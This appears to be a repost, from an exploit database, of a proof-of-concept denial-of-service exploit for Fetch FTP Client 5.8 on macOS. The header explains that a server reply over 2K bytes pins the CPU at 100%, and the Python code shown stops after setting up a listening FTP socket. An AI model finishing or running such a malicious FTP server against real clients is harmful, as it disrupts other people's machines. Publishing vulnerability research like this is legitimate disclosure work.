Fetch Softworks Fetch FTP Client 5.8 Remote CPU Consumption (Denial of Service) Vulnerability / Exploit
Exploits / Vulnerability Discovered : 2022-02-02
Type : local
Platform : macos
This exploit / vulnerability (Fetch Softworks Fetch FTP Client 5.8 Remote CPU Consumption, Denial of Service) is for educational purposes only, and if it is used you do so at your own risk!
[+] Code ...
# Exploit Title: Fetch Softworks Fetch FTP Client 5.8 - Remote CPU Consumption (Denial of Service)
# Exploit Author: liquidworm
#!/usr/bin/env python
#
#
# Fetch Softworks Fetch FTP Client 5.8 Remote CPU Consumption (Denial of Service)
#
#
# Vendor: Fetch Softworks
# Product web page: https://www.fetchsoftworks.com
# Affected version: 5.8.2 (5K1354)
#
# Summary: Fetch is a reliable, full-featured file transfer client for the
# Apple Macintosh whose user interface emphasizes simplicity and ease of use.
# Fetch supports FTP and SFTP, the most popular file transfer protocols on
# the Internet for compatibility with thousands of Internet service providers,
# web hosting companies, publishers, pre-press companies, and more.
#
# Desc: The application is prone to a DoS after receiving a long server response
# (more than 2K bytes) leading to 100% CPU consumption.
#
# --------------------------------------------------------------------------------
# ~/Desktop> ps ucp 3498
# USER    PID  %CPU %MEM      VSZ    RSS   TT  STAT STARTED      TIME COMMAND
# lqwrm  3498 100.0  0.5 60081236  54488   ??  R     5:44PM   4:28.97 Fetch-5K1354-266470421
# ~/Desktop>
# --------------------------------------------------------------------------------
#
# Tested on: macOS Monterey 12.2
#            macOS Big Sur 11.6.2
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2022-5696
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5696.php
#
#
# 27.01.2022
#
import socket
host = '0.0.0.0'
port = 21
s = socket.socket()
s.bind((host, port))
s.listen(2)